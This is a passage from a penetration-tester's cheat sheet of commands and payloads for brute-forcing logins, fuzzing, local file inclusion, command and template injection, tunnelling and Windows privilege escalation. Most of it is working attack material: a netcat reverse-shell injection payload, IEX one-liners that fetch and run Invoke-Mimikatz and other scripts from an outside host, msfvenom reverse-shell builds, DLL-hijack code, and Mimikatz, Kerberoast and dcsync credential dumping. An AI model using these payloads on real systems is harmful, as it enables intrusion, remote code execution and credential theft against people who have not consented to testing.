description\r\n type { ...TypeRef }\r\n defaultValue\r\n }\r\n\r\n fragment TypeRef on __Type {\r\n kind\r\n name\r\n ofType {\r\n kind\r\n name\r\n ofType {\r\n kind\r\n name\r\n ofType {\r\n kind\r\n name\r\n ofType {\r\n kind\r\n name\r\n ofType {\r\n kind\r\n name\r\n ofType {\r\n kind\r\n name\r\n ofType {\r\n kind\r\n name\r\n }\r\n }\r\n }\r\n }\r\n }\r\n }\r\n }\r\n }"} 698 | 699 | # Query 700 | {"query":"{\r\n AllNotes\r\n {\r\n id,author,title\r\n }\r\n }"} 701 | 702 | # References 703 | https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/GraphQL%20Injection 704 | https://apis.guru/graphql-voyager/ 705 | ``` 706 | 707 | 708 | ### Hydra 709 | 710 | ```bash 711 | => Export Proxy 712 | export HYDRA_PROXY=connect://127.0.0.1:8080 713 | 714 | => Install 715 | sudo apt-get install hydra-gtk 716 | 717 | => Commands 718 | hydra -l nik -p rockyou.txt 10.10.10.10 ssh -t 30 -f 719 | hydra -L user.txt -P pass.txt 10.10.10.10 ssh -t 30 -f 720 | hydra -L user.txt -P pass.txt 10.10.10.10 ssh -s 2222 -t 30 -f 721 | 722 | => Json 723 | hydra -l admin -P rockyou.txt localhost http-post-form '/api/login:{"username"\:"^USER^","password"\:"^PASS^","recaptcha"\:""}:Forbidden' -V -f 724 | 725 | => Json (Bypass WAF - User agent Hydra) 726 | hydra -l admin -P rockyou.txt localhost http-post-form '/api/login:{"username"\:"^USER^","password"\:"^PASS^"}:H=User-Agent\: Mozilla/5.0:H=Content-Type\: application/json:F=Wrong credentials' -V -f 727 | 728 | => POST 729 | hydra -l admin -P rockyou.txt 10.10.10.10 -s 30609 http-post-form "/j_acegi_security_check:j_username=^USER^&j_password=^PASS^&from=%2F&Submit=Sign+in:F=loginError" 730 | 731 | => GET 732 | hydra -l user -P rockyou.txt 10.10.10.10 http-get / 733 | ``` 734 | 735 | ### KeyHacks 736 | 737 | ``` 738 | # References 739 | https://github.com/streaak/keyhacks 740 | ``` 741 | 742 | ### JsonBrute 743 | 744 | ```bash 745 | # Download 746 | https://github.com/Jake-Ruston/JSONBrute 747 | 748 | #Example 1 749 | python3 jsonbrute.py --url http://localhost/v2/login --wordlist rockyou.txt --data "username=user, password=FUZZ" --code 200 750 | 751 | #Example 2 752 | python3 jsonbrute.py --url http://localhost/api/login --wordlist rockyou.txt --data "username=admin, password=FUZZ, recaptcha= " --code 200 --verbose 753 | ``` 754 | 755 | ### Wfuzz 756 | 757 | ```bash 758 | #PROXY (-p) 759 | wfuzz -u http://localhost/authenticate -w test.txt -d "uname=admin&psw=FUZZ&remember=on" -p 127.0.0.1:8080 -H "Referer: http://localhost/authenticate" 760 | 761 | #COOKIES (-b) 762 | wfuzz -u http://localhost/admin/FUZZ.php -w big.txt -b PHPSESSID=1e28or9cmi6ua05d78tov7j7t4 --hc 404 763 | 764 | #POST & output in url (/?login=username_incorrect) 765 | wfuzz -u http://localhost/login -w users.txt -w pass.txt -d "username=FUZZ&password=FUZ2Z" 766 | ``` 767 | 768 | ### Gobuster 769 | 770 | ```bash 771 | # Commands 772 | 773 | # Subdomain/Vhost 774 | gobuster vhost -r --url http://bank.local/ --wordlist subdomains-top1million-110000.txt -t 50 775 | gobuster vhost -k -r --url https://bank.local/ --wordlist subdomains-top1million-110000.txt -t 50 776 | ``` 777 | 778 | ### Vault 779 | 780 | ```bash 781 | # Commands 782 | vault kv list ssh/roles/ 783 | vault kv get secret/creds 784 | vault kv put secret/creds passcode=my-long-passcode 785 | vault ssh -mode=otp -role=my-role root@localhost 786 | 787 | # References 788 | https://www.vaultproject.io/ 789 | https://www.vaultproject.io/docs/commands/ssh 790 | ``` 791 | 792 | ### Ffuf 793 | 794 | ```bash 795 | # Install 796 | 797 | # Commands 798 | ffuf -u 'http://10.10.10.10/FUZZ' -w common.txt:FUZZ -e .php,.html,.txt,.bak -t 50 799 | ffuf -u 'https://FUZZ.bank.local' -w subdomains-top1million-20000.txt:FUZZ -t 30 800 | ffuf -u 'http://10.10.10.10/' -w sqli.txt:FUZZ -X POST -H "Content-Type: application/x-www-form-urlencoded" -d "username=FUZZ&password=FUZZ" -fc 200 801 | ffuf -u 'https://10.10.10.10/FUZZ' -w common.txt:FUZZ -e .txt -t 1 -fs 1508 -fl 4 802 | 803 | # Subomdina/Vhost 804 | ffuf -ic -c -u "http://bank.local/" -H "Host: FUZZ.bank.local" -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt:FUZZ -fc 301 805 | 806 | # POST Method 807 | ffuf -u 'http://10.10.10.10/main/wp-login.php' -w user.txt:USER -w pass.txt:PASS -X POST -H "Content-Type: application/x-www-form-urlencoded" -d "log=USER&pwd=PASS&wp-submit=Log+In" 808 | ffuf -u 'http://10.10.10.10/login.php' -w user.txt:FUZZ -w pass.txt:FUZ2Z -X POST -H "Content-Type: application/x-www-form-urlencoded" -d "user=FUZZ&pass=FUZ2Z" --fc 200 809 | ffuf -u 'http:/10.10.10.10/login.php' -w user.txt:FUZZ -w pass.txt:FUZ2Z -X POST -H "Content-Type: application/x-www-form-urlencoded" -d "user=FUZZ&pass=FUZ2Z" 810 | 811 | # With Cookie 812 | ffuf -u "http://10.10.10.10/FUZZ" -w common.txt:FUZZ -t 1 -b "cookie1=asdasdasd;cookie2=asdasdasd" 813 | 814 | # Timeout 815 | ffuf -u "http://10.10.10.10/FUZZ" -w common.txtt:FUZZ -e .txt,.html -t 1 -timeout 40 -fs 200 816 | 817 | # With proxy 818 | ffuf -u 'http://10.10.10.10/FUZZ' -w common.txt:FUZZ -t 30 -e .php,.html,.txt -x http://10.10.10.10:3128 819 | ``` 820 | 821 | ### Uploading Files 822 | 823 | ```bash 824 | Change content-type 825 | * text/html 826 | * image/gif 827 | * image/jpeg 828 | extension 829 | * .png.php 830 | * .php.png 831 | * .php%00.png 832 | * .phtml 833 | 834 | # Php content 835 | 836 | ``` 837 | 838 | ### Local File Inclusion (LFI) 839 | 840 | ```bash 841 | # References 842 | -> https://book.hacktricks.xyz/pentesting-web/file-inclusion 843 | 844 | ===PHP Wrapper=== 845 | php://filter/convert.base64-encode/resource=index.php 846 | pHp://FilTer/convert.base64-encode/resource=index.php 847 | php://filter/read=string.rot13/resource=index.php 848 | 849 | =======Linux====== 850 | # Wordlists 851 | /var/log/mail.log 852 | /etc/passwd 853 | /etc/ldap.secret 854 | /etc/shadow 855 | /etc/hosts 856 | /etc/knockd.conf 857 | /etc/exports 858 | /proc//cmdline 859 | 860 | =======LFI To RCE======== 861 | #-----[/var/log/mail.log]----- 862 | nc 10.10.10.10 25 863 | 864 | HELO test 865 | MAIL FROM: "test " 866 | RCPT TO: root 867 | DATA 868 | . 869 | #RCE 870 | ?page=/var/log/mail&cmd=ls -la 871 | 872 | #-----[/var/log/apache2/access.log]----- 873 | curl http://10.10.10.10 -A '' 874 | 875 | #RCE 876 | ?book=../../../../../../var/log/apache2/access.log&cmd=ls -la 877 | 878 | #-----[/var/mail/USER]----- 879 | nc 10.10.10.10 25 880 | 881 | HELO test 882 | MAIL FROM: www-data@solstice 883 | RCPT TO:www-data@solstice 884 | DATA 885 | 886 | . 887 | #RCE 888 | ?book=../../../../../../var/mail/www-data&cmd=ls -la 889 | 890 | ======Windows====== 891 | # Wordlists 892 | C:/windows/win.ini 893 | C:/windows/system.ini 894 | C:/windows/bootstat.dat 895 | C:/Program Files/Windows NT/Accessories/WordpadFilter.dll 896 | C:/Program Files/Common Files/mirosoft shared/Web Server Extensions//BIN/FPWEC.DLL 897 | C:/Program Files/Exchsrvr/MDBDATA/Privi.edb 898 | C:/inetpub/wwwroot/iisstart.htm 899 | C:/windows/Microsoft.NET/Framework64//vbc.exe.config 900 | C:/windows/Microsoft.NET/Framework64//Config/web.config 901 | C:/windows/System32/drivers/etc/hosts 902 | C:/windows/System32/drivers/acpi.sys 903 | C:/windows/System32/drivers/etc/networks 904 | C:/Users//Desktop/Desktop.ini 905 | C:/windows/debug/NetSetup.log 906 | C:/windows/debug/mrt.log 907 | C:/windows/system32/inetsrv/config/schema/ASPNET_schema.xml 908 | 909 | # Refrences (Windows Wordlists) 910 | - https://github.com/random-robbie/bruteforce-lists/blob/master/windows-lfi.txt 911 | 912 | # ASP.Net 913 | ../../web.config 914 | ../../Images/image.jpg 915 | ../../packages.config 916 | ../../Global.asax 917 | ../../Views/web.config 918 | ../../Content/bootstrap_dropdown.css 919 | ../../Content/Site.css 920 | ../../Views/_ViewStart.cshtml 921 | ../../Views/_ViewStart.aspx 922 | ../../Views/_ViewStart.ascx 923 | ../../Views/Shared/Error.cshtml 924 | ../../Views/Shared/Error.aspx 925 | ../../Views/Shared/Error.ascx 926 | ../../Views/Home/Index.cshtml 927 | ../../Views/Home/Index.aspx 928 | ../../Views/Home/Index.ascx 929 | ../../bin/.dll 930 | 931 | # Grep Use in web.config 932 | grep -Ri namespace | grep -v namespaces | cut -d'"' -f 1-2 933 | grep -Ri assemblyidentity | cut -d'"' -f 1-2 934 | grep -ri " type=" | grep -v compiler | cut -d'"' -f 1-4 935 | 936 | # References (ASP.Net) 937 | - https://digi.ninja/blog/when_all_you_can_do_is_read.php 938 | - https://www.c-sharpcorner.com/UploadFile/3d39b4/folder-structure-of-Asp-Net-mvc-project/ 939 | - https://blog.mindedsecurity.com/2018/10/from-path-traversal-to-source-code-in.html 940 | - https://raw.githubusercontent.com/xajkep/wordlists/master/discovery/asp_files_only.txt 941 | - http://itdrafts.blogspot.com/2013/02/aspnetclient-folder-enumeration-and.html 942 | ``` 943 | 944 | ### ASP.NET MVC Folder Structure 945 | 946 | ```bash 947 | # ASP.NET MVC Folder Structure 948 | MyFirstProject 949 | - Properties 950 | - AssemblyInfo.cs 951 | - App_Data 952 | - 953 | - App_Start 954 | - 955 | - Content 956 | - Site.css 957 | - Controllers 958 | - 959 | - fonts 960 | - 961 | - Models 962 | - 963 | - Scripts 964 | - something.js 965 | - Views 966 | - Index.cshtml/Index.aspx/Index.ascx 967 | - web.config 968 | - bin 969 | - something.dll 970 | - Images 971 | - 972 | - favicon.ico 973 | - Global.asax 974 | - packages.config 975 | - web.config 976 | 977 | # References 978 | - https://www.tutorialsteacher.com/mvc/mvc-folder-structure 979 | - https://github.com/DLarsen/Learn-ASP.NET-MVC 980 | ``` 981 | 982 | ### Checklists 983 | 984 | ``` 985 | # .Net Website Security Guidelines Checklists 986 | https://www.codeguru.com/columns/kate/.net-website-security-guidelines-checklist.html 987 | ``` 988 | 989 | ### Remote Command Execution (RCE) 990 | 991 | ```bash 992 | # Payload Command Execution 993 | '$(nc -e /bin/bash 192.168.149.129 4444)' 994 | "$(printf 'aaa\n/bin/sh\nls')" 995 | () { :;}; /bin/bash 996 | 997 | # Date 998 | %H:%M:%S';cat ../flag;# 999 | %H';date -f '../flag 1000 | %H' -f '../flag 1001 | ``` 1002 | 1003 | ### Server-Side Template Injection (SSTI) 1004 | 1005 | ```bash 1006 | => References 1007 | $ https://book.hacktricks.xyz/pentesting-web/ssti-server-side-template-injection 1008 | 1009 | => Nunjucks 1010 | {{range.constructor(\"return global.process.mainModule.require('child_process').execSync('id')\")()}} 1011 | ``` 1012 | 1013 | ### Broken Access Control 1014 | 1015 | ```bash 1016 | => Look at robots.txt 1017 | => Check javascript (urls,endpoints) 1018 | => Check parameter (functionality -> role,modified) 1019 | => URL-based (403 bypass) 1020 | -> X-Original-URL : /admin/deleteUser 1021 | -> X-Rewrite-URL : /admin/deleteUser 1022 | => Try every Method (403 bypass) 1023 | => IDOR 1024 | => Check other user ID (unpredictable) 1025 | => Check response before redirect 1026 | => Check every step of functionality (multi-step) if its affected with broken access control. 1027 | => Referer-based (Add Referer Header) 1028 | 1029 | => References 1030 | $ https://portswigger.net/web-security/access-control 1031 | $ https://infosecwriteups.com/begineers-crash-course-for-finding-access-control-vulnerabilities-in-the-web-apps-part-1-5b61cf4396c4 1032 | $ https://infosecwriteups.com/begineers-crash-course-for-finding-access-control-vulnerabilities-in-the-web-apps-part-2-ce38eabfb81a 1033 | 1034 | ``` 1035 | 1036 | ### Socat 1037 | 1038 | ```bash 1039 | socat tcp-listen:8009,fork tcp:192.168.56.104:8009 & 1040 | socat tcp-listen:8080,fork tcp:192.168.56.104:8080 & 1041 | socat tcp-listen:34483,fork tcp:192.168.56.104:34483 & 1042 | socat tcp-listen:4321,fork tcp:192.168.56.104:4321 & 1043 | ``` 1044 | 1045 | ### PyJWT 1046 | 1047 | ```bash 1048 | => Install 1049 | $ pip install PyJWT 1050 | 1051 | => Commands 1052 | $ import jwt 1053 | $ encoded = jwt.encode({"username": "o5yY6yya", "exp" : 1690896507}, "", algorithm="HS256") 1054 | $ encoded 1055 | 1056 | => References 1057 | $ https://github.com/jpadilla/pyjwt 1058 | $ https://www.epochconverter.com/ 1059 | ``` 1060 | 1061 | ### tcpdump 1062 | 1063 | ```bash 1064 | # Command 1065 | tcpdump -i lo -w /tmp/write.pcap 1066 | ``` 1067 | 1068 | ### Chisel 1069 | 1070 | ```bash 1071 | # Chisel 1072 | https://github.com/jpillora/chisel 1073 | 1074 | ## Client Machine 1075 | ./chisel client 10.66.67.154:8000 R:25:127.0.0.1:25 1076 | ./chisel client 10.66.67.130:8000 R:8080:127.0.0.1:8080 1077 | ./chisel client 10.10.10.10:8001 R:1080:socks 1078 | 1079 | ## Attacker Machine 1080 | ./chisel server -p 8000 --reverse 1081 | 1082 | # Add this in /etc/proxychains4.conf 1083 | socks5 127.0.0.1 1080 1084 | ``` 1085 | 1086 | ### Ping Sweep 1087 | 1088 | ```bash 1089 | #!/bin/bash 1090 | 1091 | for i in {1..255}; do 1092 | if out=$(ping -c 1 10.10.10.$i); then 1093 | echo "$out" | grep ttl | cut -d " " -f4 | cut -d ":" -f1 1094 | echo "$out" | grep ttl | cut -d " " -f4 | cut -d ":" -f1 >> ip.txt 1095 | fi 1096 | done 1097 | ``` 1098 | 1099 | ### Stegseek 1100 | 1101 | ```bash 1102 | # Downloads 1103 | https://github.com/RickdeJager/stegseek 1104 | 1105 | # Commands 1106 | stegseek [stegofile.jpg] [wordlist.txt] 1107 | stegeek a.jpg rockyou.txt 1108 | ``` 1109 | 1110 | ### Binwalk 1111 | ```bash 1112 | # Download/Install 1113 | https://github.com/ReFirmLabs/binwalk 1114 | sudo apt-get install -y binwalk 1115 | 1116 | # Commands 1117 | binwalk --signature firmware.bin 1118 | binwalk -A firmware.bin 1119 | 1120 | # References 1121 | - https://github.com/ReFirmLabs/binwalk/wiki/Usage 1122 | ``` 1123 | 1124 | ### Crunch 1125 | 1126 | ```bash 1127 | #options (-t) 1128 | => crunch 5 5 -t @@@@@ -o alphabet.txt 1129 | @ will insert lower case characters 1130 | , will insert upper case characters 1131 | % will insert numbers 1132 | ^ will insert symbols 1133 | ``` 1134 | 1135 | ### Kwprocessor 1136 | 1137 | ```bash 1138 | # Download 1139 | https://github.com/hashcat/kwprocessor 1140 | 1141 | # Commands 1142 | ./kwp basechar.txt keymap.txt route.txt 1143 | ./kwp -z basechars/full.base keymaps/en-us.keymap routes/2-to-16-max-3-direction-changes.route 1144 | ``` 1145 | 1146 | ### Procdump 1147 | 1148 | ```bash 1149 | # Download 1150 | https://docs.microsoft.com/en-us/sysinternals/downloads/procdump 1151 | 1152 | # Usage 1153 | .\procdump64.exe -accepteula 1154 | .\procdump64.exe -ma 1155 | ``` 1156 | 1157 | ### Hashcat 1158 | 1159 | ```bash 1160 | # Command 1161 | hashcat -m 3200 hash wordlist.txt -r best64.rule 1162 | hashcat -m 1000 hash wordlist.txt -r all4one.rule --show --username 1163 | ``` 1164 | 1165 | ### Cauldera 1166 | 1167 | ```bash 1168 | # Github 1169 | https://github.com/aaronjones111/cauldera 1170 | 1171 | # Command 1172 | ``` 1173 | 1174 | ### AWS 1175 | 1176 | ```bash 1177 | ======AWS CLI====== 1178 | # Install 1179 | 1180 | # Commands 1181 | aws s3 ls s3://bucketname 1182 | aws s3 cp file.txt s3://bucketname 1183 | aws s3 rm s3://bucketname/file.txt 1184 | aws s3 ls s3://bucketname/ --no-sign-request --region cn-northwest-1 1185 | aws s3 mv file.txt s3://bucketname 1186 | aws s3 cp s3://bucketname/file.txt . --no-sign-request --region cn-northwest-1 1187 | 1188 | # References 1189 | - https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/AWS%20Amazon%20Bucket%20S3/README.md 1190 | ``` 1191 | 1192 | ### PrivescCheck.ps1 1193 | 1194 | ```bash 1195 | # Download 1196 | wget https://raw.githubusercontent.com/itm4n/PrivescCheck/master/PrivescCheck.ps1 1197 | 1198 | # Get File from Victim Machine 1199 | wget http://10.10.14.16:80/PrivescCheck.ps1 -outfile PrivescCheck.ps1 1200 | 1201 | # Commands 1202 | . .\PrivescCheck.ps1 1203 | Invoke-PrivescCheck 1204 | 1205 | # Directly 1206 | IEX(IWR http://10.10.10.10/PrivescCheck.ps1 -UseBasicParsing); Invoke-PrivescCheck 1207 | ``` 1208 | 1209 | ### Invoke-ReflectivePEInjection 1210 | 1211 | ```bash 1212 | # Downloads 1213 | https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/CodeExecution/Invoke-ReflectivePEInjection.ps1 1214 | 1215 | # Commands 1216 | $c = "C:/patho/execute.dll" 1217 | $PEBytes = [IO.File]::ReadAllBytes($c) 1218 | Invoke-ReflectivePEInjection -PEBytes $PEBytes -FuncReturnType WString -ComputerName Target.local 1219 | ``` 1220 | 1221 | ### Windows-Exploit-Suggester 1222 | 1223 | ```bash 1224 | # Download 1225 | wget https://raw.githubusercontent.com/AonCyberLabs/Windows-Exploit-Suggester/master/windows-exploit-suggester.py 1226 | 1227 | # Commands 1228 | python windows-exploit-suggester.py --update 1229 | python windows-exploit-suggester.py -i systeminfo.txt -d 2021-04-23-mssb.xls 1230 | ``` 1231 | 1232 | ### Sysinternals 1233 | 1234 | ```bash 1235 | =====List 1236 | .\Listdlls64.exe dllhijackservice 1237 | 1238 | # References 1239 | https://docs.microsoft.com/en-us/sysinternals/downloads/ 1240 | ``` 1241 | 1242 | ### Just Another Windows (Enum) Script (JAWS) 1243 | 1244 | ```bash 1245 | # Download 1246 | https://github.com/411Hall/JAWS.git 1247 | 1248 | # Commands 1249 | IEX(New-Object Net.WebClient).downloadString('http://10.10.10.10/jaws-enum.ps1') 1250 | . .\jaws-enum.ps1 1251 | ``` 1252 | 1253 | ### WebDav 1254 | 1255 | ```bash 1256 | # Commands 1257 | davtest -url http://10.10.10.15 1258 | cadaver http://10.10.10.15/ 1259 | * put shell.txt 1260 | * move shell.txt shell.aspx 1261 | ``` 1262 | 1263 | ### Threader3000 1264 | 1265 | ```bash 1266 | # Install 1267 | pip3 install threader3000 1268 | 1269 | # Commands 1270 | threader3000 1271 | 1272 | # One Liner 1273 | for i in $(cat ip.txt); do echo "["$i"]" >> port.txt; echo "" >> port.txt;echo $i | threader3000 | grep "open" >> port.txt; echo "" >> port.txt;done 1274 | 1275 | # References 1276 | - https://github.com/dievus/threader3000 1277 | ``` 1278 | 1279 | ### Seatbelt.exe 1280 | 1281 | ```bash 1282 | # Download 1283 | https://github.com/r3motecontrol/Ghostpack-CompiledBinaries 1284 | 1285 | # Usage 1286 | Seatbelt.exe -group=all 1287 | ``` 1288 | 1289 | ### File Transfer 1290 | 1291 | ```bash 1292 | # SMB 1293 | - Create one folder name profile (mkdir profile) 1294 | - sudo /opt/Tools/impacket/examples/smbserver.py items profile 1295 | - net view \\10.10.10.10 1296 | - copy items.db \\10.10.10.10\ITEMS\items.db 1297 | 1298 | # References 1299 | https://medium.com/@PenTest_duck/almost-all-the-ways-to-file-transfer-1bd6bf710d65 1300 | ``` 1301 | 1302 | ### Firefox Decrypt 1303 | 1304 | ```bash 1305 | # Download 1306 | https://github.com/unode/firefox_decrypt.git 1307 | 1308 | # Usage 1309 | - Ensure that these files in the folder 1310 | * logins.json 1311 | * cookies.sqlite 1312 | * key4.db 1313 | * cert9.db 1314 | - python3 firefox_decrypt.py /opt/Training/Gatekeeper/profile 1315 | ``` 1316 | 1317 | ### John The Ripper 1318 | 1319 | ```bash 1320 | # Pdf2john 1321 | perl /usr/share/john/pdf2john.pl example.pdf > hash 1322 | 1323 | # Commands 1324 | john hash --wordlist=rockyou.txt 1325 | john hash --show 1326 | ``` 1327 | 1328 | ### Firefox Addons 1329 | 1330 | ```bash 1331 | # FoxyProxy 1332 | https://addons.mozilla.org/en-US/firefox/addon/foxyproxy-standard/ 1333 | 1334 | # X-Forwarded For Injector 1335 | https://addons.mozilla.org/en-US/firefox/addon/x-forwarded-for-injector/ 1336 | ``` 1337 | 1338 | ### Sshuttle 1339 | 1340 | ```bash 1341 | # Commands 1342 | sshuttle -vr sshuser@10.10.10.10 192.168.0.1/24 1343 | sshuttle -vr sshuser@10.10.10.10 -e "ssh -i id_rsa" 192.168.0.1/24 1344 | sshuttle -vr sshuser@10.10.10.10 192.168.0.1/16 1345 | ```` 1346 | 1347 | ### Pwsh 1348 | 1349 | ```bash 1350 | # Downloads/Install 1351 | https://docs.microsoft.com/en-us/powershell/scripting/install/installing-powershell-core-on-linux?view=powershell-7.1 1352 | ``` 1353 | 1354 | ### Invoke-Mimikatz.ps1 1355 | 1356 | ```bash 1357 | # Downloads 1358 | https://raw.githubusercontent.com/clymb3r/PowerShell/master/Invoke-Mimikatz/Invoke-Mimikatz.ps1 1359 | 1360 | # Commands 1361 | powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('http://10.10.10.10/Invoke-Mimikatz.ps1');Invoke-Mimikatz -DumpCreds" 1362 | Invoke-Mimikatz -DumpCreds 1363 | ``` 1364 | 1365 | ### Mimikatz.exe 1366 | 1367 | ```bash 1368 | # Run 1369 | .\mimikatz.exe 1370 | 1371 | # Commands 1372 | 1373 | # References 1374 | https://github.com/gentilkiwi/mimikatz/releases 1375 | ``` 1376 | 1377 | ### Invoke-Kerberoast.ps1 1378 | 1379 | ```bash 1380 | # Download 1381 | https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Kerberoast.ps1 1382 | 1383 | # Commands 1384 | Invoke-Kerberoast -erroraction silentlycontinue -OutputFormat Hashcat 1385 | Invoke-Kerberoast -erroraction silentlycontinue -OutputFormat Hashcat | Select-Object Hash | out-file hash.txt -Width 8000 1386 | ``` 1387 | ### Sharphound.ps1 1388 | 1389 | ```code 1390 | # Downloads 1391 | https://raw.githubusercontent.com/BloodHoundAD/BloodHound/master/Collectors/SharpHound.ps1 1392 | 1393 | # Commands 1394 | Invoke-Bloodhound -CollectionMethod All -Domain bank.local 1395 | Invoke-Bloodhound -CollectionMethod All 1396 | Invoke-Bloodhound -CollectionMethod All -ZipFileName test.zip 1397 | ``` 1398 | 1399 | ### SharpHound.exe 1400 | 1401 | ```bash 1402 | # Commands 1403 | /usr/lib/bloodhound/resources/app/Collectors/SharpHound.exe 1404 | ``` 1405 | 1406 | ### PEzor 1407 | 1408 | ```bash 1409 | => Download 1410 | $ https://github.com/phra/PEzor 1411 | 1412 | => Commands 1413 | $ sudo bash install.sh 1414 | $ ./PEzor.sh -format=exe mimikatz.exe -z 2 -p '"lsadump::dcsync /domain:spookysec.local /user:krbtgt" "exit"' 1415 | $ ./PEzor.sh -format=exe mimikatz.exe -z 2 -p '"privilege::debug" "token::elevate" "sekurlsa::logonpasswords" "lsadump::sam" "exit"' 1416 | 1417 | => References 1418 | $ 1419 | ``` 1420 | 1421 | ### jq 1422 | 1423 | ```code 1424 | # Install 1425 | sudo apt install jq 1426 | 1427 | # Example 1428 | cat 20210606133816_users.json | jq '.users[] | .Properties["name"]' 1429 | 1430 | # References 1431 | https://lzone.de/cheat-sheet/jq 1432 | 1433 | ``` 1434 | 1435 | ### Windows Privesc Escalation 1436 | 1437 | ```bash 1438 | ========Unquoted Service Path======== 1439 | -> Check if there is quote or not (") 1440 | -> Check if the directory is writable or not 1441 | -> Check if the service can be restart or not. 1442 | wmic service get name,pathname,displayname,startmode | findstr /i /v "C:\Windows\\" | findstr /i /v """ 1443 | icacls "C:\Program Files\Unquoted Path Service\Common Files" 1444 | sc query "unquotedsvc" 1445 | accesschk.exe -ucqv unquotedsvc 1446 | msfvenom -p windows/x64/shell_reverse_tcp LHOST=eth0 LPORT=9001 -f exe > Common.exe 1447 | sc stop unquotedsvc 1448 | sc start unquotedsvc 1449 | sc qc unquotedsvc 1450 | 1451 | ## Unquoted Service Path (Mitigate) 1452 | Get-ItemProperty HKLM::\SYSTEM\CurrentControlSet\Services\unquotedsvc 1453 | (Get-ItemProperty HKLM::\SYSTEM\CurrentControlSet\Services\unquotedsvc).ImagePath 1454 | Set-ItemProperty HKLM::\SYSTEM\CurrentControlSet\Services\unquotedsvc -Name ImagePath -Value '"C:\Program Files\Unquoted Path Service\Common Files\unquotedpathservice.exe"' 1455 | sc config unquotedsvc binPath= "\"C:\Program Files\Unquoted Path Service\Common Files\unquotedpathservice.exe\"" 1456 | 1457 | ## References (Unquoted Service Path) 1458 | https://www.techiessphere.com/2017/06/how-to-fix-unquoted-service-path-vulnerability.html?m=1 1459 | https://github.com/VectorBCO/windows-path-enumerate/ 1460 | 1461 | ========Dll Hijacking======== 1462 | -> Check if there is a missing Dll which cannot be loaded (NAME NOT FOUND) 1463 | -> Check if the path to the Dll is writable or not 1464 | -> Check if the service can be restart or not. 1465 | wmic service get name,pathname,displayname,startmode | findstr /i /v "C:\Windows\\" 1466 | sc query dllsvc 1467 | sc queryex dllsvc 1468 | sc stop dllsvc 1469 | sc start dllsvc 1470 | taskkil /F /PID /8080 1471 | 1472 | ## windows_dll.c 1473 | #include 1474 | 1475 | BOOL WINAPI DllMain (HANDLE hDll, DWORD dwReason, LPVOID lpReserved) { 1476 | if (dwReason == DLL_PROCESS_ATTACH) { 1477 | system("cmd.exe /k whoami > C:\\Temp\\imhere.txt"); 1478 | ExitProcess(0); 1479 | } 1480 | return TRUE; 1481 | } 1482 | 1483 | # x86 1484 | i686-w64-mingw32-gcc windows_dll.c -shared -o hijackme.dll 1485 | 1486 | # x64 1487 | x86_64-w64-mingw32-gcc windows_dll.c -shared -o hijackme.dll 1488 | 1489 | ## References (Dll Hijacking) 1490 | https://book.hacktricks.xyz/windows/windows-local-privilege-escalation/dll-hijacking 1491 | 1492 | ========Service binPath======== 1493 | 1494 | ## References (Changing Service Configuration) 1495 | https://www.ired.team/offensive-security/privilege-escalation/weak-service-permissions 1496 | 1497 | ========Others======== 1498 | 1499 | # References 1500 | https://gist.github.com/sckalath/8dacd032b65404ef7411 1501 | https://github.com/ankh2054/windows-pentest 1502 | ``` 1503 | 1504 | ### Linux Commands 1505 | 1506 | ```code 1507 | => Remove First Character 1508 | $ echo "xtest" | cut -c2- 1509 | 1510 | => Remove the first occurence character 1511 | $ echo $i | sed 's@/@@' # Remove '/' 1512 | 1513 | => Remove the first / if got 1514 | $ for i in $(cat wordlist.txt);do if [[ $i == /* ]]; then echo $i | sed 's@/@@'; else echo $i; fi;done 1515 | 1516 | => Loop and read from file (line by line) 1517 | $ while IFS= read -r line; do echo "$line" ; done < word.txt 1518 | 1519 | => xxd 1520 | $ xxd notes.txt 1521 | $ echo "62006600610038003100300034007d000d000a00" | xxd -r -p 1522 | 1523 | => Add new user 1524 | $ sudo useradd username 1525 | $ sudo useradd -d /opt/home username 1526 | $ sudo useradd -u 1002 username 1527 | $ sudo useradd -u 1002 -g 500 username 1528 | $ sudo useradd -u 1002 -G admins,webadmins,dev username 1529 | $ sudo useradd -M username 1530 | $ sudo useradd -e 2021-10-10 username 1531 | $ sudo useradd -e 2021-10-10 -f 50 username 1532 | $ sudo useradd -c "New User 2021" username 1533 | $ sudo useradd -s /sbin/nologin username 1534 | 1535 | => Add to sudo group 1536 | $ sudo usermod -aG sudo username 1537 | 1538 | => Mount 1539 | $ mkdir mount; sudo mount //10.10.10.10/Drive mount/ -o username=”nik”,password=”Passw0rd@123!” 1540 | 1541 | => ntpdate 1542 | $ ntpdate 10.10.10.10.10 1543 | 1544 | => net 1545 | $ net time set -S 10.10.10.10 1546 | 1547 | => Conversion 1548 | echo $((0x9f)) 1549 | 1550 | => Remove From sudo group 1551 | $ sudo deluser username sudo 1552 | ``` 1553 | 1554 | ### Cisco Type 7 Password Decrypter 1555 | 1556 | ```bash 1557 | # Download 1558 | https://github.com/theevilbit/ciscot7 1559 | 1560 | # Usage 1561 | python3 ciscot7.py -p "0242114B0E143F015F5D1E161713" 1562 | 1563 | # Example Password Encrypted 1564 | 0242114B0E143F015F5D1E161713 1565 | ``` 1566 | 1567 | ### Linux Alias 1568 | 1569 | ```code 1570 | alias rot13="tr 'A-Za-z' 'N-ZA-Mn-za-m'" 1571 | * echo "a" | rot13 1572 | alias urldecode='sed "s@+@ @g;s@%@\\\\x@g" | xargs -0 printf "%b"' 1573 | * echo 'P%40%24%24w0rd' | urldecode 1574 | alias base64w='iconv --to-code UTF-16LE | base64 -w 0' 1575 | * echo whoami | base64w 1576 | alias hex='xxd -p' 1577 | * echo -n "hello" | hex 1578 | * while read line; do echo $line | hex | tr "\n" " " | sed 's/ //g';echo; done < payload.txt 1579 | ``` 1580 | 1581 | ### Pentest List 1582 | 1583 | ```bash 1584 | => User Enumeration 1585 | $ https://www.vaadata.com/blog/user-enumerations-on-web-applications/ 1586 | $ https://www.rapid7.com/blog/post/2017/06/15/about-user-enumeration/ 1587 | 1588 | => Directory Listing 1589 | $ https://cwe.mitre.org/data/definitions/548.html 1590 | 1591 | => File upload 1592 | $ https://owasp.org/www-community/vulnerabilities/Unrestricted_File_Upload 1593 | 1594 | => SQL Injection 1595 | $ 